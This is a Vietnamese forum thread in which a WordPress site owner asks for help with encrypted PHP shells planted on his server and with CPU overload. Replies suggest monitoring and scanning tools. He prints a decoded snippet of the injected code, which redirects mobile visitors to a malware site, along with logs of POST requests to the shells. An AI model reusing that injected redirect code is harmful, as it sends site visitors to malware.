<![CDATA[Latest posts for the topic "Thư mục web có chưa file code PHP lạ, request CPU100% xin nhờ trợ giúp"]]> /hvaonline/posts/list/8.html JForum - http://www.jforum.net Thư mục web có chưa file code PHP lạ, request CPU100% xin nhờ trợ giúp CPU server 100%, top 1 phát thì có khoảng 1 chục request cpu 40 - 60% httpd, xem log http thì thấy client đang request vào các đường dẫn file chưa từng tồn tại trong thư mục web, file mình upload lên mediafire: Code:
http://www.mediafire.com/?7r6hi8e38rxhm8e
1. Toàn bộ đều là file php, nhưng code đã bị mã hoá, mình không rành vụ mã hoá này, mong được các bạn HVA phân tích giúp là "kẻ lạ mặt" đã và đang làm gì?. 2. Hiện tại mình tạm thời tắt quyền write thư mục, file. serve đã ổn, mình có biết chút ít về code php, đọc sơ qua các file thì hình như là "kẻ lạ mặt" đang submit POST lên server mình và get thông tin server, mình không hiểu là vì sao một vài cú POST httpd như vậy mà lại chiếm quá nhiều % CPU như thế, xin được trợ giúp cách khắc phục. Xin cám ơn.]]> /hvaonline/posts/list/44361.html#273881 /hvaonline/posts/list/44361.html#273881 GMT Thư mục web có chưa file code PHP lạ, request CPU100% xin nhờ trợ giúp /hvaonline/posts/list/44361.html#273886 /hvaonline/posts/list/44361.html#273886 GMT Thư mục web có chưa file code PHP lạ, request CPU100% xin nhờ trợ giúp

kakarottbatdong wrote:
Những file bồ đưa là những con shell php. dùng để xem thông tin php.ini và các file trên host của bồ, bồ nên tìm thêm và xoá đi, sau đó cố gắng tìm các lỗi để fix 
thanks bạn, Bạn biết cách nào để giới hạn một process httpd không dùng nhiều % CPU đã định trước không? Và không biết có chức năng, hoặc phần mềm, hoặc giải pháp nào trên linux giúp mình khoá một thư mục tuỳ chọn, nếu có file mới trong thư mục đó hoặc thư mục con của thư mục đó thì hệ thống sẽ send cho mình một email cảnh báo không?]]> /hvaonline/posts/list/44361.html#273890 /hvaonline/posts/list/44361.html#273890 GMT Thư mục web có chưa file code PHP lạ, request CPU100% xin nhờ trợ giúp

8BiBi8 wrote:
Bạn biết cách nào để giới hạn một process httpd không dùng nhiều % CPU đã định trước không?  
http://cpulimit.sourceforge.net/

8BiBi8 wrote:
Và không biết có chức năng, hoặc phần mềm, hoặc giải pháp nào trên linux giúp mình khoá một thư mục tuỳ chọn, nếu có file mới trong thư mục đó hoặc thư mục con của thư mục đó thì hệ thống sẽ send cho mình một email cảnh báo không? 
http://www.splitbrain.org/blog/2011-01/07-watcher_a_recursive_incron_alternative]]> /hvaonline/posts/list/44361.html#273893 /hvaonline/posts/list/44361.html#273893 GMT Thư mục web có chưa file code PHP lạ, request CPU100% xin nhờ trợ giúp

8BiBi8 wrote:
[ Và không biết có chức năng, hoặc phần mềm, hoặc giải pháp nào trên linux .... nếu có file mới trong thư mục đó hoặc thư mục con của thư mục đó thì hệ thống sẽ send cho mình một email cảnh báo không? 
Cái này có thể giúp được bạn: http://iwatch.sourceforge.net/index.html]]> /hvaonline/posts/list/44361.html#273894 /hvaonline/posts/list/44361.html#273894 GMT Thư mục web có chưa file code PHP lạ, request CPU100% xin nhờ trợ giúp /hvaonline/posts/list/44361.html#273902 /hvaonline/posts/list/44361.html#273902 GMT Thư mục web có chưa file code PHP lạ, request CPU100% xin nhờ trợ giúp

8BiBi8 wrote:
1. Toàn bộ đều là file php, nhưng code đã bị mã hoá, mình không rành vụ mã hoá này, mong được các bạn HVA phân tích giúp là "kẻ lạ mặt" đã và đang làm gì?.  
Bạn thử paste vào đây: http://ddecode.com/phpdecoder/ xem. Sau đó phân tích rồi tìm cách chặn.]]> /hvaonline/posts/list/44361.html#273924 /hvaonline/posts/list/44361.html#273924 GMT Thư mục web có chưa file code PHP lạ, request CPU100% xin nhờ trợ giúp

quanta wrote:
Việc giám sát thư mục rồi gửi mail cảnh báo khi có file nào đó bị upload lên chỉ là biện pháp tạm thời thôi. Khi đó thì chuyện đã rồi. Điều quan trọng bạn cần tìm ra là các files này được upload lên bằng đường nào. Bạn thử paste vào đây: http://ddecode.com/phpdecoder/ xem. Sau đó phân tích rồi tìm cách chặn. 
Cám ơn bạn quanta đã có lời khuyên. Decode đoạn đầu mã hoá của file stat6jcp.php: Code:
if ((preg_match('/text\/vnd.wap.wml|application\/vnd.wap.xhtml\+xml/si', @$_SERVER['HTTP_ACCEPT']) || preg_match('/alcatel|amoi|android|avantgo|blackberry|benq|cell|cricket|docomo|elaine|htc|iemobile|iphone|ipad|ipaq|ipod|j2me|java|opera.mini|midp|mmp|mobi|motorola|nec-|nokia|palm|panasonic|philips|phone|sagem|sharp|sie-|smartphone|sony|symbian|t-mobile|telus|up\.browser|up\.link|vodafone|wap|webos|wireless|xda|xoom|zte/si', @$_SERVER['HTTP_USER_AGENT']) || preg_match('/msearch|m\?q=/si', @$_SERVER['HTTP_REFERER'])) && !preg_match('/macintosh|america|avant|download|windows\-media\-player|yandex|google/si', @$_SERVER['HTTP_USER_AGENT'])) { echo '<script>window.location="http://mobile-mobi.info/?2"</script>'; flush(); exit; }
với link http://mobile-mobi.info bị KIS của mình báo là có mailware (mình dùng Chrome với add-on NoScript nên cũng mạo hiểm vào xem mobile-mobi.info là cái gì nhưng KIS đã chặn). Mình có xem file log, với 1 đoạn được trích lại như sau: Code:
95.117.81.127 - - [07/Mar/2013:11:19:18 +0700] "POST /wp-content/themes/las92/faqIwy.php HTTP/1.1" 404 232 "-" "Mozilla/5.0"
109.28.217.142 - - [07/Mar/2013:11:20:34 +0700] "POST /wp-content/themes/las92/faqIwy.php HTTP/1.1" 404 232 "-" "Mozilla/5.0"
194.90.37.157 - - [07/Mar/2013:11:20:35 +0700] "POST /wp-content/themes/las92/faqIwy.php HTTP/1.1" 404 232 "-" "Mozilla/5.0"
187.79.201.124 - - [07/Mar/2013:11:21:09 +0700] "POST /wp-content/themes/las92/faqIwy.php HTTP/1.1" 404 232 "-" "Mozilla/5.0"
2.39.20.133 - - [07/Mar/2013:11:21:29 +0700] "POST /wp-content/themes/las92/faqIwy.php HTTP/1.1" 404 232 "-" "Mozilla/5.0"
188.76.173.75 - - [07/Mar/2013:11:22:43 +0700] "POST /wp-content/themes/las92/faqIwy.php HTTP/1.1" 404 232 "-" "Mozilla/5.0"
158.181.185.91 - - [07/Mar/2013:11:23:01 +0700] "POST /wp-content/themes/las92/faqIwy.php HTTP/1.1" 404 232 "-" "Mozilla/5.0"
201.153.171.206 - - [07/Mar/2013:11:23:07 +0700] "POST /wp-content/themes/las92/faqIwy.php HTTP/1.1" 404 232 "-" "Mozilla/5.0"
189.129.188.95 - - [07/Mar/2013:11:23:29 +0700] "POST /wp-content/themes/las92/faqIwy.php HTTP/1.1" 404 232 "-" "Mozilla/5.0"
194.250.79.99 - - [07/Mar/2013:11:25:35 +0700] "POST /wp-content/themes/las92/faqIwy.php HTTP/1.1" 404 232 "-" "Mozilla/5.0"
180.106.230.161 - - [07/Mar/2013:11:25:56 +0700] "POST /wp-content/themes/las92/faqIwy.php HTTP/1.1" 404 232 "-" "Mozilla/5.0"
83.35.90.225 - - [07/Mar/2013:11:26:50 +0700] "POST /wp-content/themes/las92/faqIwy.php HTTP/1.1" 404 232 "-" "Mozilla/5.0"
189.191.63.4 - - [07/Mar/2013:11:27:16 +0700] "POST /wp-content/themes/las92/faqIwy.php HTTP/1.1" 404 232 "-" "Mozilla/5.0"
121.186.121.125 - - [07/Mar/2013:11:27:24 +0700] "POST /wp-content/themes/las92/faqIwy.php HTTP/1.1" 404 232 "-" "Mozilla/5.0"
79.183.121.44 - - [07/Mar/2013:11:27:34 +0700] "POST /wp-content/themes/las92/faqIwy.php HTTP/1.1" 404 232 "-" "Mozilla/5.0"
95.117.81.127 - - [07/Mar/2013:11:27:59 +0700] "POST /wp-content/themes/las92/faqIwy.php HTTP/1.1" 404 232 "-" "Mozilla/5.0"
194.250.79.99 - - [07/Mar/2013:11:28:46 +0700] "POST /wp-content/themes/las92/faqIwy.php HTTP/1.1" 404 232 "-" "Mozilla/5.0"
187.172.68.80 - - [07/Mar/2013:11:29:03 +0700] "POST /wp-content/themes/las92/faqIwy.php HTTP/1.1" 404 232 "-" "Mozilla/5.0"
189.168.130.93 - - [07/Mar/2013:11:29:16 +0700] "POST /wp-content/themes/las92/faqIwy.php HTTP/1.1" 404 232 "-" "Mozilla/5.0"
180.106.230.161 - - [07/Mar/2013:11:29:25 +0700] "POST /wp-content/themes/las92/faqIwy.php HTTP/1.1" 404 232 "-" "Mozilla/5.0"
99.9.152.6 - - [07/Mar/2013:11:31:11 +0700] "POST /wp-content/themes/las92/faqIwy.php HTTP/1.1" 404 232 "-" "Mozilla/5.0"
201.153.171.206 - - [07/Mar/2013:11:31:15 +0700] "POST /wp-content/themes/las92/faqIwy.php HTTP/1.1" 404 232 "-" "Mozilla/5.0"
187.202.224.207 - - [07/Mar/2013:11:31:39 +0700] "POST /wp-content/themes/las92/faqIwy.php HTTP/1.1" 404 232 "-" "Mozilla/5.0"
87.205.78.141 - - [07/Mar/2013:11:32:26 +0700] "POST /wp-content/themes/las92/faqIwy.php HTTP/1.1" 404 232 "-" "Mozilla/5.0"
83.61.157.227 - - [07/Mar/2013:11:32:52 +0700] "POST /wp-content/themes/las92/faqIwy.php HTTP/1.1" 404 232 "-" "Mozilla/5.0"
79.183.121.44 - - [07/Mar/2013:11:34:04 +0700] "POST /wp-content/themes/las92/faqIwy.php HTTP/1.1" 404 232 "-" "Mozilla/5.0"
84.77.79.174 - - [07/Mar/2013:11:34:46 +0700] "POST /wp-content/themes/las92/faqIwy.php HTTP/1.1" 404 232 "-" "Mozilla/5.0"
206.214.15.66 - - [07/Mar/2013:11:35:51 +0700] "POST /wp-content/themes/las92/faqIwy.php HTTP/1.1" 404 232 "-" "Mozilla/5.0"
180.93.240.44 - - [07/Mar/2013:11:36:27 +0700] "GET /wp-content/themes/las92/info.html HTTP/1.1" 200 2064 "<web người dùng bình thường>" "Mozilla/5.0 (Windows NT 5.1; rv:19.0) Gecko/20100101 Firefox/19.0"
180.93.240.44 - - [07/Mar/2013:11:36:27 +0700] "GET /wp-content/themes/las92/info.swf HTTP/1.1" 200 1076366 "web người dùng bình thường" "Mozilla/5.0 (Windows NT 5.1; rv:19.0) Gecko/20100101 Firefox/19.0"
118.69.197.136 - - [07/Mar/2013:11:36:41 +0700] "POST /wp-cron.php?doing_wp_cron=1362631001.1471779346466064453125 HTTP/1.0" 200 - "-" "WordPress/3.4.2; web người dùng bình thường"
180.93.240.44 - - [07/Mar/2013:11:36:40 +0700] "GET /?p=27&lang=en HTTP/1.1" 200 14697 "web người dùng bình thường" "Mozilla/5.0 (Windows NT 5.1; rv:19.0) Gecko/20100101 Firefox/19.0"
180.93.240.44 - - [07/Mar/2013:11:36:41 +0700] "GET /wp-content/plugins/sitepress-multilingual-cms/res/css/language-selector.css?v=2.5.0 HTTP/1.1" 200 175 "web người dùng bình thường" "Mozilla/5.0 (Windows NT 5.1; rv:19.0) Gecko/20100101 Firefox/19.0"
180.93.240.44 - - [07/Mar/2013:11:36:41 +0700] "GET /wp-content/themes/las92/download/style.css HTTP/1.1" 200 15660 "web người dùng bình thường" "Mozilla/5.0 (Windows NT 5.1; rv:19.0) Gecko/20100101 Firefox/19.0"
180.93.240.44 - - [07/Mar/2013:11:36:41 +0700] "GET /wp-content/themes/las92/download/flexcrollstyles.css HTTP/1.1" 200 1316 "web người dùng bình thường" "Mozilla/5.0 (Windows NT 5.1; rv:19.0) Gecko/20100101 Firefox/19.0"
180.93.240.44 - - [07/Mar/2013:11:36:41 +0700] "GET /wp-content/themes/las92/download/flexcroll.js HTTP/1.1" 200 15019 "web người dùng bình thường" "Mozilla/5.0 (Windows NT 5.1; rv:19.0) Gecko/20100101 Firefox/19.0"
180.93.240.44 - - [07/Mar/2013:11:36:41 +0700] "GET /wp-content/themes/las92/download/mootools-1.2-more.js HTTP/1.1" 200 18934 "web người dùng bình thường" "Mozilla/5.0 (Windows NT 5.1; rv:19.0) Gecko/20100101 Firefox/19.0"
Có vẻ như các ip cứ truy cập vào file hack đều đều từng giây một và đổi ip liên tục (chắc là muốn vượt firewall), minh nghĩ chắc là ai đó đã hack web của mình bằng các plugin chưa được cập nhật, chỉ có 2 thư mục wp-content/plugins và wp-content/themes trên web có quyền write và cả 2 đều chứa file hack. Nhưng mình vẫn không hiểu là việc cứ 1s request vào "POST /wp-content/themes/las92/faqIwy.php HTTP/1.1" để làm gì nữa? Mình đã mv toàn bộ thư mục web sang chỗ khác và chown nó sang root, xong svn lại toàn bộ web (svn cho lẹ, đỡ phải tìm từng file hack rồi xoá, hic ). p/s: bạn quanta cho mình hỏi là có cách nào block các request này không theo như logs mình có copy ở trên]]> /hvaonline/posts/list/44361.html#273932 /hvaonline/posts/list/44361.html#273932 GMT Thư mục web có chưa file code PHP lạ, request CPU100% xin nhờ trợ giúp Code:
0.83.130.250 - - [08/Mar/2013:10:51:15 +0700] "POST /administrator/index.class.php HTTP/1.1" 200 10 "-" "Mozilla/5.0 Firefox/3.6.12"
124.150.140.90 - - [08/Mar/2013:10:51:17 +0700] "POST /administrator/index.class.php HTTP/1.1" 200 10 "-" "Mozilla/5.0 Firefox/3.6.12"
95.172.4.3 - - [08/Mar/2013:10:51:16 +0700] "POST /administrator/index.class.php HTTP/1.1" 200 10 "-" "Mozilla/5.0 Firefox/3.6.12"
178.239.167.212 - - [08/Mar/2013:10:51:16 +0700] "POST /administrator/index.class.php HTTP/1.1" 200 10 "-" "Mozilla/5.0 Firefox/3.6.12"
96.30.48.108 - - [08/Mar/2013:10:51:17 +0700] "POST /administrator/index.class.php HTTP/1.1" 200 10 "-" "Mozilla/5.0 Firefox/3.6.12"
188.138.100.217 - - [08/Mar/2013:10:51:18 +0700] "POST /administrator/index.class.php HTTP/1.1" 200 10 "-" "Mozilla/5.0 Firefox/3.6.12"
82.148.68.2 - - [08/Mar/2013:10:51:11 +0700] "POST /administrator/index.class.php HTTP/1.1" 200 10 "-" "Mozilla/5.0 Firefox/3.6.12"
69.39.155.106 - - [08/Mar/2013:10:51:21 +0700] "POST /administrator/index.class.php HTTP/1.1" 200 10 "-" "Mozilla/5.0 Firefox/3.6.12"
66.96.128.60 - - [08/Mar/2013:10:51:23 +0700] "POST /administrator/index.class.php HTTP/1.1" 200 10 "-" "Mozilla/5.0 Firefox/3.6.12"
89.31.145.75 - - [08/Mar/2013:10:51:25 +0700] "POST /administrator/index.class.php HTTP/1.1" 200 10 "-" "Mozilla/5.0 Firefox/3.6.12"
80.83.130.250 - - [08/Mar/2013:10:51:25 +0700] "POST /administrator/index.class.php HTTP/1.1" 200 10 "-" "Mozilla/5.0 Firefox/3.6.12"
122.112.3.88 - - [08/Mar/2013:10:51:26 +0700] "POST /administrator/index.class.php HTTP/1.1" 200 10 "-" "Mozilla/5.0 Firefox/3.6.12"
124.150.140.90 - - [08/Mar/2013:10:51:26 +0700] "POST /administrator/index.class.php HTTP/1.1" 200 10 "-" "Mozilla/5.0 Firefox/3.6.12"
217.16.9.220 - - [08/Mar/2013:10:51:21 +0700] "POST /administrator/index.class.php HTTP/1.1" 200 10 "-" "Mozilla/5.0 Firefox/3.6.12"
80.83.130.250 - - [08/Mar/2013:10:51:34 +0700] "POST /administrator/index.class.php HTTP/1.1" 200 10 "-" "Mozilla/5.0 Firefox/3.6.12"
96.53.101.50 - - [08/Mar/2013:10:51:34 +0700] "POST /administrator/index.class.php HTTP/1.1" 200 10 "-" "Mozilla/5.0 Firefox/3.6.12"
66.96.128.60 - - [08/Mar/2013:10:51:39 +0700] "POST /administrator/index.class.php HTTP/1.1" 200 10 "-" "Mozilla/5.0 Firefox/3.6.12"
82.85.114.57 - - [08/Mar/2013:10:50:45 +0700] "POST /administrator/index.class.php HTTP/1.1" 200 - "-" "Mozilla/5.0 Firefox/3.6.12"
221.132.35.45 - - [08/Mar/2013:10:51:44 +0700] "POST /administrator/index.class.php HTTP/1.1" 200 10 "-" "Mozilla/5.0 Firefox/3.6.12"
85.249.230.64 - - [08/Mar/2013:10:51:45 +0700] "POST /administrator/index.class.php HTTP/1.1" 200 10 "-" "Mozilla/5.0 Firefox/3.6.12"
85.249.230.64 - - [08/Mar/2013:10:51:46 +0700] "POST /administrator/index.class.php HTTP/1.1" 200 10 "-" "Mozilla/5.0 Firefox/3.6.12"
210.193.30.212 - - [08/Mar/2013:10:51:43 +0700] "POST /administrator/index.class.php HTTP/1.1" 200 10 "-" "Mozilla/5.0 Firefox/3.6.12"
66.96.128.60 - - [08/Mar/2013:10:51:49 +0700] "POST /administrator/index.class.php HTTP/1.1" 200 10 "-" "Mozilla/5.0 Firefox/3.6.12"
89.18.179.45 - - [08/Mar/2013:10:51:50 +0700] "POST /administrator/index.class.php HTTP/1.1" 200 10 "-" "Mozilla/5.0 Firefox/3.6.12"
27.251.157.23 - - [08/Mar/2013:10:51:45 +0700] "POST /administrator/index.class.php HTTP/1.1" 200 10 "-" "Mozilla/5.0 Firefox/3.6.12"
Vì các request của cùng 1 IP thời gian cách nhau xa nên csf của mình không đưa vào blacklist, mình tạm thời theo dõi và deny IP bằng tay để giải quyết tạm thời. Hi vọng mọi người có giải pháp hay hơn cho trường hợp này. @8BiBi8 : hiện tại mình sử dụng ClamAV ( http://www.clamav.net/lang/en/ )để scan các vấn đề về shell cho server, bản thử tham khảo xem có giúp ích được gì không nhé.]]> /hvaonline/posts/list/44361.html#273951 /hvaonline/posts/list/44361.html#273951 GMT Thư mục web có chưa file code PHP lạ, request CPU100% xin nhờ trợ giúp sallythanhson, vượt ra chủ đề rồi]]> /hvaonline/posts/list/44361.html#274013 /hvaonline/posts/list/44361.html#274013 GMT Thư mục web có chưa file code PHP lạ, request CPU100% xin nhờ trợ giúp /hvaonline/posts/list/44361.html#274182 /hvaonline/posts/list/44361.html#274182 GMT